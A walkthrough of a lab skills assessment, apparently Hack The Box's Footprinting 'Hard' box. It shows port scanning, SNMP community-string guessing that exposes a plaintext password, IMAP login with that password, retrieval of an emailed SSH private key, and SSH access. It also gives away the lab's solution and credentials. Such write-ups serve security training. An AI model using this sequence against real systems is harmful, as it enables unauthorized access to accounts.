Footprinting — Skills Assessment [Part 2] (2025)
For part one walkthrough covering Easy & Platform skill assessments. Part two only focuses on Hard skill assessment.
Footprinting Lab — Hard
“The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.”
Reading this description, I already had a clue that for this skill assessment we’d be dealing with potential IMAP/POP3 servers. I ran the Nmap command to understand the services.
nmap 10.129.xxx.xx -sV -sC -p- -v --min-rate=1000 -oN hardSkil_results.txtPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL CAPA USER SASL(PLAIN) AUTH-RESP-CODE STLS PIPELINING TOP RESP-CODES
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_imap-capabilities: more capabilities have AUTH=PLAINA0001 listed Pre-login OK post-login ID SASL-IR IMAP4rev1 ENABLE LITERAL+ LOGIN-REFERRALS IDLE STARTTLS
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_imap-capabilities: capabilities more have OK listed Pre-login post-login ID SASL-IR IMAP4rev1 ENABLE LITERAL+ LOGIN-REFERRALS IDLE AUTH=PLAINA0001
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER SASL(PLAIN) AUTH-RESP-CODE CAPA PIPELINING TOP RESP-CODES
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelI ran two openssl commands to see if there was any information that could be useful, because at this point we were trying to solve this from an external viewpoint:
openssl s_client -connect 10.129.xxx.xx:pop3sCONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = NIXHARD
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = NIXHARD
verify return:1
---
Certificate chain
0 s:CN = NIXHARD
i:CN = NIXHARD
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Nov 10 01:30:25 2021 GMT; NotAfter: Nov 8 01:30:25 2031 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIUC6tYfrtqQqCrhjYv11bUtaKet3EwDQYJKoZIhvcNAQEL
BQAwEjEQMA4GA1UEAwwHTklYSEFSRDAeFw0yMTExMTAwMTMwMjVaFw0zMTExMDgw
MTMwMjVaMBIxEDAOBgNVBAMMB05JWEhBUkQwggEiMA0GCSqGSIb3DQEBAQUAA4IB
DwAwggEKAoIBAQDEBpDfkH4Ro5ZXW44NvnF3N9lKz27V1hgRppyUk5y/SEPKt2zj
EU+r2tEHUeHoJHQZBbW0ybxh+X2H3ZPNEG9nV1GtFQfTBVcrUEpN5VV15aIbdh+q
j53pp/wcL/d8+Zg2ZAaVYWvQHVqtsAudQmynrV1MHA39A44fG3/SutKlurY8AKR0
MW5zMPtflMc/N3+lH8UUMBf2Q+zNSyZLiBEihxK3kfMW92HqWeh016egSIFuxUsH
kk4xpGmyG9NDYna47dQzoHCg+42KgqFvWrGw2nIccaEIX5XA8rU9u53C7EQzDzmQ
vAtHpKWBwNmiivxAz/QC7MPExWIWtZtOqxmfAgMBAAGjITAfMAkGA1UdEwQCMAAw
EgYDVR0RBAswCYIHTklYSEFSRDANBgkqhkiG9w0BAQsFAAOCAQEAG+Dm9pLJgNGC
X1YmznmtBUekhXMrU67tQl745fFasJQzIrDgVtK27fjAtQRwvIbDruSwTj47E7+O
XdS7qyjFNBerklWNq4fEAVI7BmkxnTS9542okA/+UmeG70LdKjzFS+LjjOnyWzTh
YwU8uUjLfnRca74kY0DkVHOIkwZQha0J+BrKSADq/zDjkG0g4v0vzHINOmHx9eiE
67NoJKJPY5S3RYWxl/4x8Kphx7PNJBPC75gYjlxxDhxdYu9a3daqJUa58/qOm6P8
w1P9nA6lkg7NopyqepulLAzIcqnTjb/nMD2Pd9b6vgWc3IqSfFreqjzshZ+FjNZo
zR+tR6z4TQ==
-----END CERTIFICATE-----
subject=CN = NIXHARD
issuer=CN = NIXHARD
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1283 bytes and written 373 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: B3E7A5A80A7BE58BC40F25977B86EA796895A65AE70A70CC8466739FEC884150
Session-ID-ctx:
Resumption PSK: E24C82FDE4518977A1FF94321F38539BC5CC0499D8472CAB075A0C4DE1F89A8523F7BCADCAF81A70A412CF6FEE84AA1F
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 9b 61 a3 5b 90 b5 c2 65-d0 46 0a d3 9e 15 c0 c9 .a.[...e.F......
0010 - d4 70 fb a5 ce 68 66 c1-0b 11 91 27 fe a8 3d b2 .p...hf....'..=.
0020 - 28 bb ff 72 be 81 05 57-0a 45 e3 1b 79 71 4a 09 (..r...W.E..yqJ.
0030 - d3 43 a4 77 15 5f 81 9f-b0 43 b0 3e ba af d5 b7 .C.w._...C.>....
0040 - 4c 59 11 5e bf 86 ee e2-1e d7 06 c0 0d b1 81 21 LY.^...........!
0050 - f2 58 02 43 47 d7 f9 7f-f1 ff b6 21 b0 d3 f2 82 .X.CG......!....
0060 - c0 be e5 6a e6 50 44 7d-1a 2e be 43 35 0a 44 0d ...j.PD}...C5.D.
0070 - 47 ba 50 e0 8d 26 c4 f9-fb 9e cb e3 a6 f0 a3 40 G.P..&.........@
0080 - 19 db e7 99 d2 a0 e1 04-d0 ac b5 b1 90 e1 e2 40 ...............@
0090 - 6e ae 7c 06 ce 82 1a 0b-63 d8 c0 05 5c b6 32 44 n.|.....c...\.2D
00a0 - 80 3e 40 41 5c d3 c7 ec-f5 14 de b4 26 69 67 f7 .>@A\.......&ig.
00b0 - 1a d6 49 22 70 e7 0a 91-64 a0 70 ce 4d 56 c2 41 ..I"p...d.p.MV.A
Start Time: 1763929287
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 3E5EEBBFDAB478D1F9114712E79C657388EB17CD9C632ADA40C3D937A980D664
Session-ID-ctx:
Resumption PSK: ADC138269C8D259A20D775DE13C0FE29433172DE3F04BCB6359213A9C2F7594D7AED21FAEB94FCC73ABF8ECE3526D155
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 9b 61 a3 5b 90 b5 c2 65-d0 46 0a d3 9e 15 c0 c9 .a.[...e.F......
0010 - 81 60 c6 bd af f0 28 b2-2e 23 ad 1e af 78 3e d0 .`....(..#...x>.
0020 - 37 d0 e2 b0 14 ec 56 c2-1e 53 e5 de 14 2f 18 d4 7.....V..S.../..
0030 - 18 a0 81 dc 7c 73 24 02-96 cd 06 a1 f7 c6 be 14 ....|s$.........
0040 - a9 26 6e e8 9b e1 c7 18-a0 80 a2 f2 f0 84 a3 c5 .&n.............
0050 - 5b 9d 20 ff 88 15 82 11-71 c6 5d b5 a6 7c 04 04 [. .....q.]..|..
0060 - 70 bd 1a af 12 10 4e d3-8f 84 78 b6 c6 76 7c a8 p.....N...x..v|.
0070 - af 89 d4 8d ba 9f d2 12-fa ba 34 34 bf 3d 91 a1 ..........44.=..
0080 - f8 79 32 47 aa 06 89 ab-a1 ef 65 fe 6c af 0f 7e .y2G......e.l..~
0090 - 11 b9 f3 77 8f 02 59 79-5d 0d bd af 72 3b 6b b0 ...w..Yy]...r;k.
00a0 - 34 d6 12 96 4d c3 b5 f3-2f 61 0c f3 f3 e5 fe 17 4...M.../a......
00b0 - 5b a3 92 4a 4c 9f 3d 16-0c 12 2b 14 2b d2 a7 62 [..JL.=...+.+..b
Start Time: 1763929287
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
+OK Dovecot (Ubuntu) ready.openssl s_client -connect 10.129.xxx.xx:imapsCONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = NIXHARD
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = NIXHARD
verify return:1
---
Certificate chain
0 s:CN = NIXHARD
i:CN = NIXHARD
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Nov 10 01:30:25 2021 GMT; NotAfter: Nov 8 01:30:25 2031 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIUC6tYfrtqQqCrhjYv11bUtaKet3EwDQYJKoZIhvcNAQEL
BQAwEjEQMA4GA1UEAwwHTklYSEFSRDAeFw0yMTExMTAwMTMwMjVaFw0zMTExMDgw
MTMwMjVaMBIxEDAOBgNVBAMMB05JWEhBUkQwggEiMA0GCSqGSIb3DQEBAQUAA4IB
DwAwggEKAoIBAQDEBpDfkH4Ro5ZXW44NvnF3N9lKz27V1hgRppyUk5y/SEPKt2zj
EU+r2tEHUeHoJHQZBbW0ybxh+X2H3ZPNEG9nV1GtFQfTBVcrUEpN5VV15aIbdh+q
j53pp/wcL/d8+Zg2ZAaVYWvQHVqtsAudQmynrV1MHA39A44fG3/SutKlurY8AKR0
MW5zMPtflMc/N3+lH8UUMBf2Q+zNSyZLiBEihxK3kfMW92HqWeh016egSIFuxUsH
kk4xpGmyG9NDYna47dQzoHCg+42KgqFvWrGw2nIccaEIX5XA8rU9u53C7EQzDzmQ
vAtHpKWBwNmiivxAz/QC7MPExWIWtZtOqxmfAgMBAAGjITAfMAkGA1UdEwQCMAAw
EgYDVR0RBAswCYIHTklYSEFSRDANBgkqhkiG9w0BAQsFAAOCAQEAG+Dm9pLJgNGC
X1YmznmtBUekhXMrU67tQl745fFasJQzIrDgVtK27fjAtQRwvIbDruSwTj47E7+O
XdS7qyjFNBerklWNq4fEAVI7BmkxnTS9542okA/+UmeG70LdKjzFS+LjjOnyWzTh
YwU8uUjLfnRca74kY0DkVHOIkwZQha0J+BrKSADq/zDjkG0g4v0vzHINOmHx9eiE
67NoJKJPY5S3RYWxl/4x8Kphx7PNJBPC75gYjlxxDhxdYu9a3daqJUa58/qOm6P8
w1P9nA6lkg7NopyqepulLAzIcqnTjb/nMD2Pd9b6vgWc3IqSfFreqjzshZ+FjNZo
zR+tR6z4TQ==
-----END CERTIFICATE-----
subject=CN = NIXHARD
issuer=CN = NIXHARD
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1283 bytes and written 373 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 4750EA78CBE552EC859CE0795A28A01DB3A43FBE59166378CFBF5693BC9DD816
Session-ID-ctx:
Resumption PSK: 1F4F09C96EFDCDB44BBD8134DBAA47D23D8D86CC68C4CA4993DC47D486DD5E7166E27962595800F249321D4569BCFB14
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 31 5c 4b 8f 3b bb 48 dc-e1 8a c4 73 23 78 44 1c 1\K.;.H....s#xD.
0010 - eb 63 fd 56 78 c8 62 60-a0 12 a0 05 2d d4 c4 b5 .c.Vx.b`....-...
0020 - 39 37 12 84 66 ac e9 3b-46 99 8a 7e b2 a2 05 55 97..f..;F..~...U
0030 - 29 0c e8 b4 b0 a4 0a 26-07 96 a0 10 36 46 3e d8 )......&....6F>.
0040 - 95 8d ae 4a 87 f7 01 a3-9a 39 3e 4c 2e c2 03 8b ...J.....9>L....
0050 - da a9 a1 26 99 4d 36 0d-4c ae aa d4 1b 2e 1b f8 ...&.M6.L.......
0060 - 18 09 36 c4 0f 80 3d f6-04 06 b9 da ea 1d 7f 5a ..6...=........Z
0070 - 6e 25 0f ce 06 7a 1d 22-79 a0 06 cc dc f4 72 08 n%...z."y.....r.
0080 - 48 04 4c 12 70 28 ee e9-3e a1 10 01 2f 08 72 8d H.L.p(..>.../.r.
0090 - d6 6e 9f ae 96 48 a5 1a-c3 ba ea 89 fa c5 f5 c3 .n...H..........
00a0 - cd 31 25 40 d8 e7 a3 52-e7 9c bb d6 b1 a2 f0 5b .1%@...R.......[
00b0 - 61 2b 16 cd 91 0a d4 89-40 e2 94 f0 4a bd 45 4c a+......@...J.EL
Start Time: 1763929404
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 68EED913B41FF8C3FA9D86EAF6B3A0DADD5A3420B919CC6B8998FC9B6AE78F81
Session-ID-ctx:
Resumption PSK: 1881B96CBE616C1507FF17ED47945FEEFB3DEADA3B4721B3715AC941D3F22425FE56EBFDEBA113FDD5B6EED681E291D6
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 31 5c 4b 8f 3b bb 48 dc-e1 8a c4 73 23 78 44 1c 1\K.;.H....s#xD.
0010 - b3 1b 3c 12 63 56 69 96-02 77 c2 55 d4 cb 18 df ..<.cVi..w.U....
0020 - d5 ab 6a 54 b9 bb 01 8d-9c 04 34 15 56 0a c9 2a ..jT......4.V..*
0030 - 26 d4 2f 51 60 25 b1 7b-70 b7 b1 2d ad d0 3a be &./Q`%.{p..-..:.
0040 - 67 bf 59 22 20 33 82 3c-3a ef 39 bf 3a 1c 1e fb g.Y" 3.<:.9.:...
0050 - 6e 8d e9 b4 5a 7d 40 c3-eb 4c f7 c8 90 e0 9e 05 n...Z}@..L......
0060 - ea 2b 43 7a 1b da 37 69-a2 09 2b 5f 00 e5 c5 22 .+Cz..7i..+_..."
0070 - 5d b2 e4 f0 6e 23 c5 66-cb 70 85 18 da c9 b6 27 ]...n#.f.p.....'
0080 - cf c0 e7 81 ee bc 2a 1d-f9 50 da 2b 4d ef 9f 52 ......*..P.+M..R
0090 - 00 d5 86 8c 42 7e 8c dc-c4 7a 89 03 9a 19 8f 22 ....B~...z....."
00a0 - 5e dc 67 f3 ab 5d 7e 13-c4 d0 1d a3 3f 02 18 d1 ^.g..]~.....?...
00b0 - 9f 34 8f 01 37 d1 00 65-3d d9 79 52 9b b1 a8 5c .4..7..e=.yR...\
Start Time: 1763929404
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.
So far, the only clue that I could find from running these commands was that there was a NIXHARD organization present on the server. I reran a different Nmap scan, this time looking for any UDP ports, and I found UDP/161 open, aka SNMP.
nmap 10.129.xxx.xx -sV -sC -p- --min-rate=1000 -v -sU -oN UDPresults.txtPORT STATE SERVICE VERSION
161/udp open snmp net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5b99e75a10288b6100000000
| snmpEngineBoots: 11
|_ snmpEngineTime: 21m46sIt seemed like SNMP would be the starting point. Again, we are still external up to this point. I used the onesixtyone tool with the community string wordlist used earlier to see if I could gather any useful information.
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.xxx.xxUnfortunately it didn’t yield any results. I tried using the snmpwalk tool next:
snmpwalk -v2c -c public 10.129.202.20It didn’t return any results either. However, looking back at the skill assessment description later on, I realized I had missed an important detail earlier: this was a backup server of some kind. After some time, I realized I should change the snmpwalk community string to reflect this detail. Rerunning with that in mind showed some new key details:
snmpwalk -v2c -c backup 10.129.xxx.xxiso.3.6.1.2.1.1.1.0 = STRING: "Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (287141) 0:47:51.41
iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (288070) 0:48:00.70
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 0B 19 01 2A 34 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-90-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro ipv6.disable=1 maybe-ubiquity
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 141
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)Here are three major takeaways from this log:
1. "/opt/tom-recovery.sh" is a script of some kind, presumably related to resetting Tom's credentials as a contingency?
2. "tom NMds732Js2761" appears to be credentials, likely for the POP3S and/or IMAPS service.
3. The script in question attempted to run chpasswd to change Tom's password, but failed due to lack of permission.
Based on this latest information, I tried to SSH into Tom’s account with the exposed credentials, but got a Permission denied (publickey) error, which basically means the server doesn't deny that user tom exists, but it needs Tom's private key to log in. I already assumed his private keys would likely be in the mailbox.
ssh tom@10.129.xxx.xx I then attempted to log into the target’s POP3/IMAP services, starting first with POP3 and seeing if I could catch any new details from the mailboxes.
POP3S didn’t yield much in the way of results when enumerating, so I moved on to IMAPS next. Tom’s credentials worked as expected.
read R BLOCK
+OK Dovecot (Ubuntu) ready.
USER tom
+OK
PASS NMds732Js2761
+OK Logged in.
RETR 1
RENEGOTIATING
ERROR
40E7C61A507F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2882:IMAPS would provide another breakthrough shortly. I am not too familiar with the commands for either POP3S/IMAPS, so I had to play around and see what I could do with some trial-and-error commands:
1 LOGIN tom NMds732Js2761
1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
1 SELECT INBOX <---[Step 1]
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).
* 1 EXISTS
* BAD Error in IMAP command 1: Unknown command (0.001 + 0.000 secs).
a FETCH 1 BODY[] <---[Step 2]
* 1 FETCH (BODY[] {3661}After the a FETCH 1 BODY[] command execution, it showed an email that contained the private key to an account, bypassing the need for a password. Since the email was sent directly to tom@inlanefreight.htb, it was easy to tell that the private key belonged to this user specifically.
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEA9snuYvJaB/QOnkaAs92nyBKypu73HMxyU9XWTS+UBbY3lVFH0t+F
+yuX+57Wo48pORqVAuMINrqxjxEPA7XMPR9XIsa60APplOSiQQqYreqEj6pjTj8wguR0Sd
hfKDOZwIQ1ILHecgJAA0zY2NwWmX5zVDDeIckjibxjrTvx7PHFdND3urVhelyuQ89BtJ....[SNIPPET]I copied the entire private key into my own host, and saved it in nano as id_rsa. I then attempted to SSH into Tom's account using what I gathered. The first attempt failed because of permissions issues, which was easy to fix.
ssh tom@10.129.202.20 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
tom@10.129.202.20: Permission denied (publickey).chmod 600 id_rsaSecond SSH attempt:
ssh tom@10.129.202.20 -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 25 Nov 2025 02:06:27 AM UTC
System load: 0.0 Processes: 167
Usage of /: 70.0% of 5.40GB Users logged in: 0
Memory usage: 30% IPv4 address for ens192: 10.129.202.20
Swap usage: 0%
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
